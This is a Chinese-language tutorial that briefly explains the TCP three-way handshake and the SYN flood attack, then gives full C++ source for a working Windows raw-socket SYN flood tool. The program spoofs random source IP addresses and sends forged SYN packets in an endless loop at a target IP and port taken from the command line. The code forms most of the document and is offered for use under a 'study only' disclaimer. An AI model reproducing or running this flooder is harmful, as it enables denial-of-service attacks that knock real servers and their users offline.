SYN_FLOOD 简单分析及实现
WriteBy: LionD8
email:LionD8@eyou.com
声明:
此程序有一定攻击性,请只供学习之用,不要危害祖国的网络。如发动攻击一切后果本人概不负责。
网络上发送数据包的攻击有多种(如ICMP_FLOOD, 碎片攻击,等)其中有一种就是 利用TCP 协议三次 握手的攻击(SYN_FLOOD)。下面 就简单 讲述一下 TCP 的三次 握手。
现在 有A,B 两台 机器,其中B是SERVER.A是CLIENT.
首先 A 发送送一个 带有SYN标记(带起始序列号)的数据报 给B。
然后 B 接收, 然后 发送一个ACK+SYN(带B机的起始序列号 和 A的确认号)给A。
最后 A 再发送 一个带序列号 和 确认号的 数据报 给 B。
此时 连接 完成。
利用这个原理,如果A机在第一步伪装大量不存在的机器,给B发送大量的SYN包,那么B会以为有很多合法的机器请求连接,然后一一回应。然后等待第三次 确认建立连接。那么大量等待连接的请求被保留在栈中。一般服务器等待2分钟还没等到第三次握手,那么就会从等待连接的栈中删除连接请求。如果A的SYN发送得足够快,合法用户连接不上,那么服务器也会花费大量的资源来维护栈。从而照成D.o.S攻击。
通过RAW_SOCKET,只要你是管理员,就可以伪造IP和TCP头部,发虚假源地址的SYN请求。
==========================================
简单实现如下:
/* FLOOD.CPP*/
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <time.h>
#include <dos.h>
#pragma comment(lib, "ws2_32.lib")
#define MAX_RECEIVEBYTE 255
typedef struct ip_head //定义IP首部
{
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位 (如SYN,ACK,等)
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (如ICMP,TCP等)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IPHEADER;
typedef struct tcp_head //定义TCP首部
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/6位保留字
unsigned char th_flag; //6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量
}TCPHEADER;
typedef struct tsd_head //定义TCP伪首部
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}PSDHEADER;
//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void usage()
{
printf("***********************************************************");
printf("SYN_FLOOD MADE BY LionD8");
printf("Useage: FLOOD Target_ip Target_port Delay_time ");
printf("***********************************************************");
}
//Delay_time单位为毫秒。
int main(int argc, char* argv[])
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
int SourcePort;
char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;
int sleeptime;
usage();
if (argc < 3 || argc >4 )
{ printf("input error! ");
return false; }
if (argc==4) sleeptime=atoi(argv[3]);
else sleeptime=300;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!");
return false;
}
sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket Setup Error!");
return false;
}
flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!");
return false;
}
nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR) //设置发送的时间
{
printf("setsockopt SO_SNDTIMEO error!");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(atoi(argv[2]));
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
while(TRUE)
{
//填充IP首部
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)); //IP总长度
ipHeader.ident=1;
ipHeader.frag_and_flags=0; //无分片
ipHeader.ttl=(unsigned char)GetTickCount()%87+123;
ipHeader.proto=IPPROTO_TCP; // 协议类型为 TCP
ipHeader.checksum=0; //效验位先初始为0
ipHeader.sourceIP=htonl(GetTickCount()*474695); //随机产生一个伪造的IP
ipHeader.destIP=inet_addr(argv[1]); //目标IP
//填充TCP首部
SourcePort=GetTickCount()*43557%9898; //随机产生一个端口号
tcpHeader.th_dport=htons(atoi(argv[2])); //发送的目的端口
tcpHeader.th_sport=htons(SourcePort); //源端口号
tcpHeader.th_seq=htonl(0x12345678); //序列号
tcpHeader.th_ack=0; //确认号
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=2; //为SYN请求
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_sum=0;
//填充TCP伪首部用来计算TCP头部的效验和
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
//计算校验和
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
//把伪造好的IP头 和 TCP 头 放进 buf 准备发送
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
//发送数据包
rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%x",WSAGetLastError());
return false;
}
else
printf("send ok!");
Sleep(sleeptime); //根据自己网速的快慢确定此值,sleeptime越小发得越快
}//endwhile //重新伪造IP的源地址等再次向目标发送
closesocket(sock);
WSACleanup();
return 0;
}
在VC++6.0 下编译通过。